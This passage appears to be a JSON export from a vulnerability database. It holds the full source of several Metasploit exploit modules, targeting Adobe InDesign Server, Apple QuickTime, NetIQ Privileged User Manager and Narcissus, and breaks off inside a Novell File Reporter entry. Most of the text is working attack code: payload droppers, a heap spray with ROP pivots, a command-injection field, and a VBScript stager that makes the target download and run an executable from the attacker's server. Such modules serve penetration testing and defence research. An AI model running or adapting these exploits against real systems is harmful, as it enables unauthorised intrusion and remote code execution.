"metasploit", "title": "Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution',\n 'Description' => %q{\n This module abuses the \"RunScript\" procedure provided by the SOAP interface of\n Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).\n\n The exploit drops the payload on the server and must be removed manually.\n },\n 'Author' =>\n [\n 'h0ng10', # Vulnerability discovery / Metasploit module\n 'juan vazquez' # MacOSX target\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => %w{ osx win },\n 'Privileged' => false,\n 'DisclosureDate' => 'Nov 11 2012',\n 'References' =>\n [\n [ 'OSVDB', '87548'],\n [ 'URL', 'http://secunia.com/advisories/48572/' ]\n ],\n 'Targets' =>\n [\n [\n 'Indesign CS6 Server / Windows (64 bits)',\n {\n 'Arch' => ARCH_X64,\n 'Platform' => 'win'\n }\n ],\n [\n 'Indesign CS6 Server / Mac OS X Snow Leopard 64 bits',\n {\n 'Arch' => ARCH_X64,\n 'Platform' => 'osx'\n }\n ]\n ],\n 'DefaultTarget' => 0\n ))\n\n register_options( [ Opt::RPORT(12345) ])\n end\n\n\n def send_soap_request(script_code, script_type)\n script_code.gsub!(/&/, '&')\n soap_xml = %Q{\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\nxmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\nxmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:IDSP=\"http://ns.adobe.com/InDesign/soap/\">\n <SOAP-ENV:Body>\n <IDSP:RunScript>\n <IDSP:runScriptParameters>\n <IDSP:scriptText>#{script_code}</IDSP:scriptText>\n <IDSP:scriptLanguage>#{script_type}</IDSP:scriptLanguage>\n </IDSP:runScriptParameters>\n </IDSP:RunScript>\n </SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n}\n\n res = send_request_cgi({\n 'uri' => '/',\n 'method' => 'POST',\n 'content-type' => 'application/x-www-form-urlencoded',\n 'data' => soap_xml,\n }, 5)\n end\n\n\n def check()\n # Use a very simple javascript\n check_var = rand_text_numeric(10)\n checkscript = 'returnValue = \"' + check_var + '\"'\n\n res = send_soap_request(checkscript, \"javascript\")\n\n return Exploit::CheckCode::Vulnerable if res.body.include?('<data xsi:type=\"xsd:string\">' + check_var + '</data>')\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n\n if target.name =~ /Windows/\n print_status(\"Creating payload vbs script\")\n encoded_payload = generate_payload_exe().unpack(\"H*\").join\n exe_file = Rex::Text.rand_text_alpha_upper(8) + \".exe\"\n wsf = Rex::Text.rand_text_alpha(8)\n payload_var = Rex::Text.rand_text_alpha(8)\n exe_name_var = Rex::Text.rand_text_alpha(8)\n file_var = Rex::Text.rand_text_alpha(8)\n byte_var = Rex::Text.rand_text_alpha(8)\n shell_var = Rex::Text.rand_text_alpha(8)\n\n # This one creates a smaller vbs payload (without deletion)\n vbs = %Q{\nSet #{wsf} = CreateObject(\"Scripting.FileSystemObject\")\n#{payload_var} = \"#{encoded_payload}\"\n#{exe_name_var} = #{wsf}.GetSpecialFolder(2) + \"\\\\#{exe_file}\"\nSet #{file_var} = #{wsf}.opentextfile(#{exe_name_var}, 2, TRUE)\nFor x = 1 To Len(#{payload_var})-3 Step 2\n #{byte_var} = Chr(38) & \"H\" & Mid(#{payload_var}, x, 2)\n #{file_var}.write Chr(#{byte_var})\nNext\n\n#{file_var}.write Chr(#{byte_var})\n#{file_var}.close\n\nSet #{shell_var} = CreateObject(\"Wscript.Shell\")\n#{shell_var}.Run Chr(34) & #{exe_name_var} & Chr(34), 0, False\nSet #{shell_var} = Nothing\nreturnValue = #{exe_name_var}\n }\n #\tvbs = Msf::Util::EXE.to_exe_vbs(exe)\n print_status(\"Sending SOAP request\")\n\n res = send_soap_request(vbs, \"visual basic\")\n if res != nil and res.body != nil then\n file_to_delete = res.body.to_s.scan(/<data xsi:type=\"xsd:string\">(.*)<\\/data><\\/scriptResult>/).flatten[0]\n print_warning \"Payload deployed to #{file_to_delete.to_s}, please remove manually\"\n end\n\n elsif target.name =~ /Mac OS X/\n\n print_status(\"Creating payload apple script\")\n\n exe_payload = generate_payload_exe\n b64_exe_payload = Rex::Text.encode_base64(exe_payload)\n b64_payload_name = rand_text_alpha(rand(5) + 5)\n payload_name = rand_text_alpha(rand(5) + 5)\n\n apple_script = %Q{\nset fp to open for access POSIX file \"/tmp/#{b64_payload_name}.txt\" with write permission\nwrite \"begin-base64 644 #{payload_name}\\n#{b64_exe_payload}\\n====\\n\" to fp\nclose access fp\ndo shell script \"uudecode -o /tmp/#{payload_name} /tmp/#{b64_payload_name}.txt\"\ndo shell script \"rm /tmp/#{b64_payload_name}.txt\"\ndo shell script \"chmod +x /tmp/#{payload_name}\"\ndo shell script \"/tmp/#{payload_name}\"\nset returnValue to \"/tmp/#{payload_name}\"\n }\n\n print_status(\"Sending SOAP request\")\n\n res = send_soap_request(apple_script, \"applescript\")\n\n if res != nil and res.body != nil then\n file_to_delete = res.body.to_s.scan(/<data xsi:type=\"xsd:string\">(.*)<\\/data><\\/scriptResult>/).flatten[0]\n file_to_delete = \"/tmp/#{payload_name}\" if file_to_delete.nil? or file_to_delete.empty?\n print_warning \"Payload deployed to #{file_to_delete.to_s}, please remove manually\"\n elsif not res\n print_status \"No response, it's expected\"\n print_warning \"Payload deployed to /tmp/#{payload_name}, please remove manually\"\n end\n\n end\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/indesign_server_soap.rb"}, {"lastseen": "2019-11-04T11:49:19", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack based overflow occurs when processing a malformed Content-Type header. The module has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.\n", "modified": "2017-10-05T21:44:36", "published": "2012-11-27T11:10:00", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/APPLE_QUICKTIME_MIME_TYPE", "href": "", "type": "metasploit", "title": "Apple QuickTime 7.7.2 MIME Type Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::RopDb\n\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n # :os_name => OperatingSystems::Match::WINDOWS,\n # :ua_name => HttpClients::SAFARI,\n # :ua_maxver => '5.0.1',\n # :ua_maxver => '5.1.7',\n # :javascript => true,\n # :rank => NormalRanking, # reliable memory corruption\n # :vuln_test => nil\n #})\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple QuickTime 7.7.2 MIME Type Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack\n based overflow occurs when processing a malformed Content-Type header. The module\n has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.\n },\n 'Author' =>\n [\n 'Pavel Polischouk', # Vulnerability discovery\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-3753' ],\n [ 'OSVDB', '87088'],\n [ 'BID', '56438' ],\n [ 'URL', 'http://support.apple.com/kb/HT5581' ],\n [ 'URL', 'http://asintsov.blogspot.com.es/2012/11/heapspray.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Payload' =>\n {\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested with QuickTime 7.7.2\n [ 'Automatic', {} ],\n [ 'Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2',\n {\n 'OffsetFirstStackPivot' => 389,\n 'OffsetSecondStackPivot' => 105,\n 'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,\n 'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts\n 'SprayOffset' => 264,\n 'SprayedAddress' => 0x60130124\n }\n ],\n [ 'Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2',\n {\n 'OffsetFirstStackPivot' => 389,\n 'OffsetSecondStackPivot' => 105,\n 'FirstStackPivot' => 0x671a230b, # ADD ESP,4B8 # RETN # Quicktime.qts,\n 'SecondStackPivot' => 0x67123437, # pop esp / ret # Quicktime.qts\n 'SprayOffset' => 264,\n 'SprayedAddress' => 0x60130124\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Nov 07 2012',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ], self.class\n )\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n\n browser_name = \"\"\n if agent =~ /Safari/ and agent=~ /Version\\/5\\.1\\.7/\n browser_name = \"Safari 5.1.7\"\n elsif agent =~ /Safari/ and agent=~ /Version\\/5\\.0\\.5/\n browser_name = \"Safari 5.0.5\"\n end\n\n os_name = 'Windows XP SP3'\n\n targets.each do |t|\n if (!browser_name.empty? and t.name.include?(browser_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def on_request_uri(client, request)\n\n agent = request.headers['User-Agent']\n my_target = get_target(agent)\n\n # Avoid the attack if the victim doesn't have the same setup we're targeting\n if my_target.nil?\n print_error(\"Browser not supported: #{agent}\")\n send_not_found(cli)\n return\n end\n\n return if ((p = regenerate_payload(client)) == nil)\n\n if request.uri =~ /\\.smil$/\n print_status(\"Sending exploit (target: #{my_target.name})\")\n smil = rand_text_alpha(20)\n type = rand_text_alpha_lower(1)\n subtype = rand_text_alpha_lower(my_target['OffsetSecondStackPivot'])\n subtype << [my_target['SecondStackPivot']].pack(\"V\")\n subtype << [my_target['SprayedAddress']].pack(\"V\")\n subtype << rand_text_alpha_lower(my_target['OffsetFirstStackPivot'] - subtype.length)\n subtype << rand_text_alpha_lower(4)\n subtype << [my_target['FirstStackPivot']].pack(\"V\")\n subtype << rand_text_alpha_lower(10000 - subtype.length)\n send_response(client, smil, { 'Content-Type' => \"#{type}/#{subtype}\" })\n else\n print_status(\"Sending initial HTML\")\n url = ((datastore['SSL']) ? \"https://\" : \"http://\")\n url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])\n url << \":\" + datastore['SRVPORT'].to_s\n url << get_resource\n fname = rand_text_alphanumeric(4)\n\n code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})\n js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(my_target.arch))\n offset = rand_text(my_target['SprayOffset'])\n js_offset = Rex::Text.to_unescape(offset, Rex::Arch.endian(my_target.arch))\n fill = rand_text(4)\n js_fill = Rex::Text.to_unescape(fill, Rex::Arch.endian(my_target.arch))\n\n # Heap Spray based on http://asintsov.blogspot.com.es/2012/11/heapspray.html\n js = <<-JSSPRAY\nfunction heapSpray(offset, shellcode, fillsled) {\n var chunk_size, headersize, fillsled_len, code;\n var i, codewithnum;\n chunk_size = 0x40000;\n headersize = 0x10;\n fillsled_len = chunk_size - (headersize + offset.length + shellcode.length);\n while (fillsled.length <fillsled_len)\n fillsled += fillsled;\n fillsled = fillsled.substring(0, fillsled_len);\n code = offset + shellcode + fillsled;\n heap_chunks = new Array();\n for (i = 0; i<1000; i++)\n {\n codewithnum = \"HERE\" + code;\n heap_chunks[i] = codewithnum.substring(0, codewithnum.length);\n }\n}\nvar myoffset = unescape(\"#{js_offset}\");\nvar myshellcode = unescape(\"#{js_code}\");\nvar myfillsled = unescape(\"#{js_fill}\");\nheapSpray(myoffset,myshellcode,myfillsled);\n JSSPRAY\n\n if datastore['OBFUSCATE']\n js = ::Rex::Exploitation::JSObfu.new(js)\n js.obfuscate(memory_sensitive: true)\n end\n\n content = \"<html>\"\n content << \"<head><script>\"\n content << \"#{js}\"\n content << \"</script></head>\"\n content << \"<body>\"\n content << <<-ENDEMBED\n<OBJECT\nCLASSID=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\"\nWIDTH=\"1\"\nHEIGHT=\"1\"\nCODEBASE=\"http://www.apple.com/qtactivex/qtplugin.cab\">\n<PARAM name=\"SRC\" VALUE = \"#{url}/#{fname}.smil\">\n<PARAM name=\"QTSRC\" VALUE = \"#{url}/#{fname}.smil\">\n<PARAM name=\"AUTOPLAY\" VALUE = \"true\" >\n<PARAM name=\"TYPE\" VALUE = \"video/quicktime\" >\n<PARAM name=\"TARGET\" VALUE = \"myself\" >\n<EMBED\n SRC = \"#{url}/#{fname}.smil\"\n QTSRC = \"#{url}/#{fname}.smil\"\n TARGET = \"myself\"\n WIDTH = \"1\"\n HEIGHT = \"1\"\n AUTOPLAY = \"true\"\n PLUGIN = \"quicktimeplugin\"\n TYPE = \"video/quicktime\"\n CACHE = \"false\"\n PLUGINSPAGE= \"http://www.apple.com/quicktime/download/\" >\n</EMBED>\n</OBJECT>\n ENDEMBED\n content << \"</body></html>\"\n send_response(client, content, { 'Content-Type' => \"text/html\" })\n end\n\n # Handle the payload\n handler(client)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/apple_quicktime_mime_type.rb"}, {"lastseen": "2019-12-04T09:42:01", "bulletinFamily": "exploit", "description": "This module abuses a lack of authorization in the NetIQ Privileged User Manager service (unifid.exe) to execute arbitrary perl code. The problem exists in the ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.\n", "modified": "2019-08-02T14:48:53", "published": "2012-11-20T22:15:21", "id": "MSF:EXPLOIT/WINDOWS/NOVELL/NETIQ_PUM_EVAL", "href": "", "type": "metasploit", "title": "NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/file_dropper'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution',\n 'Description' => %q{\n This module abuses a lack of authorization in the NetIQ Privileged User Manager\n service (unifid.exe) to execute arbitrary perl code. The problem exists in the\n ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over\n Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.\n },\n 'Author' => [\n 'rgod', # Vulnerability discovery and PoC\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2012-5932' ],\n [ 'OSVDB', '87334' ],\n [ 'BID', '56539' ],\n [ 'EDB', '22738' ]\n ],\n 'Payload' =>\n {\n 'Space' => 2048,\n 'StackAdjustment' => -3500\n },\n 'Platform' => 'win',\n 'Privileged' => true,\n 'Targets' =>\n [\n ['Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1', { }],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Nov 15 2012'\n ))\n\n register_options(\n [\n Opt::RPORT(443),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60])\n ])\n\n self.needs_cleanup = true\n end\n\n def check\n data = fake_login\n\n print_status(\"Sending fake login request...\")\n\n res = send_request_cgi(\n {\n 'uri' => '/',\n 'version' => '1.1',\n 'method' => 'POST',\n 'ctype' => \"application/x-amf\",\n 'headers' => {\n \"x-flash-version\" => \"11,4,402,278\"\n },\n 'data' => data,\n })\n\n if res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/ and res.body =~ /2\\.3\\.1/\n return Exploit::CheckCode::Appears\n elsif res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/\n return Exploit::CheckCode::Detected\n end\n return Exploit::CheckCode::Safe\n end\n\n def on_new_session(session)\n if session.type == \"meterpreter\"\n session.core.use(\"stdapi\") unless session.ext.aliases.include?(\"stdapi\")\n end\n\n @dropped_files.delete_if do |file|\n win_file = file.gsub(\"/\", \"\\\\\\\\\")\n if session.type == \"meterpreter\"\n begin\n windir = session.sys.config.getenv('WINDIR')\n win_file = \"#{windir}\\\\system32\\\\#{win_file}\"\n # Meterpreter should do this automatically as part of\n # fs.file.rm(). Until that has been implemented, remove the\n # read-only flag with a command.\n session.shell_command_token(%Q|attrib.exe -r \"#{win_file}\"|)\n session.fs.file.rm(win_file)\n print_good(\"Deleted #{file}\")\n true\n rescue ::Rex::Post::Meterpreter::RequestError\n false\n end\n\n end\n end\n\n end\n\n # Handle incoming requests from the target\n def on_request_uri(cli, request)\n\n vprint_status(\"on_request_uri called\")\n\n if (not @exe_data)\n print_error(\"A request came in, but the EXE archive wasn't ready yet!\")\n return\n end\n\n print_good(\"Sending the EXE payload to the target...\")\n send_response(cli, @exe_data)\n @exe_sent = true\n end\n\n def lookup_lhost()\n # Get the source address\n if datastore['SRVHOST'] == '0.0.0.0'\n Rex::Socket.source_address('50.50.50.50')\n else\n datastore['SRVHOST']\n end\n end\n\n def fake_login\n data = \"\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x15\\x53\\x50\\x46\\x2e\\x55\\x74\" # ..........SPF.Ut\n data << \"\\x69\\x6c\\x2e\\x63\\x61\\x6c\\x6c\\x4d\\x6f\\x64\\x75\\x6c\\x65\\x45\\x78\\x00\" # il.callModuleEx.\n data << \"\\x02\\x2f\\x34\\x00\\x00\\x00\\x64\\x0a\\x00\\x00\\x00\\x01\\x03\\x00\\x03\\x70\" # ./4...d........p\n data << \"\\x6b\\x74\\x03\\x00\\x0b\\x43\\x72\\x65\\x64\\x65\\x6e\\x74\\x69\\x61\\x6c\\x73\" # kt...Credentials\n data << \"\\x03\\x00\\x04\\x6e\\x61\\x6d\\x65\\x02\\x00\\x04\\x74\\x65\\x73\\x74\\x00\\x06\" # ...name...test..\n data << \"\\x70\\x61\\x73\\x73\\x77\\x64\\x02\\x00\\x04\\x74\\x65\\x73\\x74\\x00\\x00\\x09\" # passwd...test...\n data << \"\\x00\\x06\\x6d\\x65\\x74\\x68\\x6f\\x64\\x02\\x00\\x05\\x6c\\x6f\\x67\\x69\\x6e\" # ..method...login\n data << \"\\x00\\x06\\x6d\\x6f\\x64\\x75\\x6c\\x65\\x02\\x00\\x04\\x61\\x75\\x74\\x68\\x00\" # ..module...auth.\n data << \"\\x03\\x75\\x69\\x64\\x06\\x00\\x00\\x09\\x00\\x00\\x09\"; # .uid.......\n return data\n end\n\n def exploit\n\n data = fake_login\n\n print_status(\"Sending fake login request...\")\n res = send_request_cgi(\n {\n 'uri' => '/',\n 'version' => '1.1',\n 'method' => 'POST',\n 'ctype' => \"application/x-amf\",\n 'headers' => {\n \"x-flash-version\" => \"11,4,402,278\"\n },\n 'data' => data,\n })\n\n if not res or res.code != 200 or res.body !~ /svc(.+)/\n fail_with(Failure::Unknown, 'Fake Login failed, svc not identified')\n end\n\n svc = $1\n svc_length = svc[1, 2].unpack(\"n\")[0]\n svc_name = svc[3, svc_length]\n vprint_status(\"SVC Found: #{svc_name}\")\n\n print_status(\"Generating the EXE Payload...\")\n @exe_data = generate_payload_exe\n exename = Rex::Text.rand_text_alpha(1+rand(2))\n\n print_status(\"Setting up the Web Service...\")\n datastore['SSL'] = false\n resource_uri = '/' + exename + '.exe'\n service_url = \"http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}\"\n print_status(\"Starting up our web service on #{service_url} ...\")\n start_service({'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }})\n datastore['SSL'] = true\n\n # http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/\n vbs_stage = Rex::Text.rand_text_alpha(3+rand(5))\n code = \"system(\\\"echo Set F=CreateObject(\\\\\\\"Microsoft.XMLHTTP\\\\\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo F.Open \\\\\\\"GET\\\\\\\",\\\\\\\"#{service_url}\\\\\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo Set IA=CreateObject(\\\\\\\"ADODB.Stream\\\\\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo IA.SaveToFile \\\\\\\"%WINDIR%\\\\system32\\\\#{exename}.exe\\\\\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"echo CreateObject(\\\\\\\"WScript.Shell\\\\\\\").Run \\\\\\\"%WINDIR%\\\\system32\\\\#{exename}.exe\\\\\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\\\");\"\n code << \"system(\\\"#{vbs_stage}.vbs\\\");\"\n register_file_for_cleanup(\"#{vbs_stage}.vbs\")\n register_file_for_cleanup(\"#{exename}.exe\")\n identity = \"\"\n\n data = \"\\x00\\x00\\x00\\x00\\x00\\x01\"\n data << \"\\x00\\x14\"\n data << \"SPF.Util.callModuleA\"\n data << \"\\x00\\x00\"\n data << \"\\x00\"\n data << \"\\x00\\x02\"\n data << \"\\x0a\\x0a\"\n data << \"\\x00\\x00\\x00\\x01\\x03\"\n data << \"\\x00\\x03\"\n data << \"pkt\"\n data << \"\\x03\"\n data << \"\\x00\\x06\"\n data << \"method\"\n data << \"\\x02\"\n data << \"\\x00\\x04\"\n data << \"eval\"\n data << \"\\x00\\x06\"\n data << \"module\"\n data << \"\\x02\"\n data << \"\\x00\\x08\"\n data << \"ldapagnt\"\n data << \"\\x00\\x04\"\n data << \"Eval\"\n data << \"\\x03\"\n data << \"\\x00\\x07\"\n data << \"content\"\n data << \"\\x02\"\n data << [code.length + 4].pack(\"n\")\n data << code\n data << \"\\x0a\\x0a1;\\x0a\\x0a1;\"\n data << \"\\x00\\x00\\x09\"\n data << \"\\x00\\x00\\x09\"\n data << \"\\x00\\x03\"\n data << \"uid\"\n data << \"\\x02\"\n data << [identity.length].pack(\"n\")\n data << identity\n data << \"\\x00\\x00\\x09\"\n data << \"\\x00\\x08\"\n data << \"svc_name\"\n data << \"\\x02\"\n data << [svc_name.length].pack(\"n\")\n data << svc_name\n data << \"\\x00\\x00\\x09\"\n\n print_status(\"Sending the eval code request...\")\n\n res = send_request_cgi(\n {\n 'uri' => '/',\n 'version' => '1.1',\n 'method' => 'POST',\n 'ctype' => \"application/x-amf\",\n 'headers' => {\n \"x-flash-version\" => \"11,4,402,278\"\n },\n 'data' => data,\n })\n\n if res\n fail_with(Failure::Unknown, \"There was an unexpected response to the code eval request\")\n else\n print_good(\"There wasn't a response, but this is the expected behavior...\")\n end\n\n # wait for the data to be sent\n print_status(\"Waiting for the victim to request the EXE payload...\")\n\n waited = 0\n while (not @exe_sent)\n select(nil, nil, nil, 1)\n waited += 1\n if (waited > datastore['HTTP_DELAY'])\n fail_with(Failure::Unknown, \"Target didn't request request the EXE payload -- Maybe it cant connect back to us?\")\n end\n end\n\n print_status(\"Giving time to the payload to execute...\")\n select(nil, nil, nil, 20)\n\n print_status(\"Shutting down the web service...\")\n stop_service\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/novell/netiq_pum_eval.rb"}, {"lastseen": "2019-11-26T04:51:01", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Narcissus image configuration function. This is due to the backend.php file not handling the $release parameter properly, and then passes it on to the configure_image() function. In this function, the $release parameter can be used to inject system commands for passthru (a PHP function that's meant to be used to run a bash script by the vulnerable application), which allows remote code execution under the context of the web server.\n", "modified": "2017-07-24T13:26:21", "published": "2012-11-19T21:12:57", "id": "MSF:EXPLOIT/UNIX/WEBAPP/NARCISSUS_BACKEND_EXEC", "href": "", "type": "metasploit", "title": "Narcissus Image Configuration Passthru Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Narcissus Image Configuration Passthru Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Narcissus image configuration\n function. This is due to the backend.php file not handling the $release parameter\n properly, and then passes it on to the configure_image() function. In this\n function, the $release parameter can be used to inject system commands for\n passthru (a PHP function that's meant to be used to run a bash script by the\n vulnerable application), which allows remote code execution under the context\n of the web server.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Dun', #Original\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n [ 'EDB', '22709' ],\n [ 'OSVDB', '87410' ]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x0d\\x0a\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl ruby python netcat netcat-e'\n },\n },\n 'Platform' => %w{ linux unix },\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n ['Narcissus', {}]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Nov 14 2012\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The URI path to the web application', '/narcissus-master/'])\n ])\n end\n\n def base\n uri = target_uri.path\n uri << '/' if uri[-1,1] != '/'\n return uri\n end\n\n def remote_exe(command)\n res = send_request_cgi({\n 'uri' => \"#{base}backend.php\",\n 'method' => 'POST',\n 'encode_params' => false,\n 'vars_post' => {\n 'machine' => '0',\n 'action' => 'configure_image',\n 'release' => \"|#{command}\"\n }\n })\n\n vprint_line(res.body) if res\n return res\n end\n\n def check\n sig = rand_text_alpha(rand(10) + 5) #The string to check\n\n vprint_status(\"Looking for signature '#{sig}'...\")\n res = remote_exe(\"echo #{sig}\")\n\n if res and res.body =~ /#{sig}/\n vprint_status(\"Signature '#{sig}' found.\")\n return Exploit::CheckCode::Vulnerable\n else\n vprint_status(\"Signature not found\")\n return Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n print_status(\"Sending malicious request...\")\n remote_exe(payload.encoded)\n end\n\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/narcissus_backend_exec.rb"}, {"lastseen": "2019-11-26T04:50:50", "bulletinFamily": "exploit", "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload arbitrary files via a directory traversal while handling requests to /FSF/CMD with FSFUI records with UICMD 130. This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).\n", "modified": "2019-08-02T14:48:53", "published": "2012-11-16T15:03:09", "id": "MSF:EXPLOIT/WINDOWS/NOVELL/FILE_REPORTER_FSFUI_UPLOAD", "href": "", "type": "metasploit", "title": "NFR Agent FSFUI Record File Upload RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NFR Agent FSFUI Record File Upload RCE',\n 'Description' => %q{\n NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload\n arbitrary files via a directory traversal while handling requests to /FSF/CMD with\n FSFUI records with UICMD 130. This module has been tested successfully against NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).\n },\n 'License' => 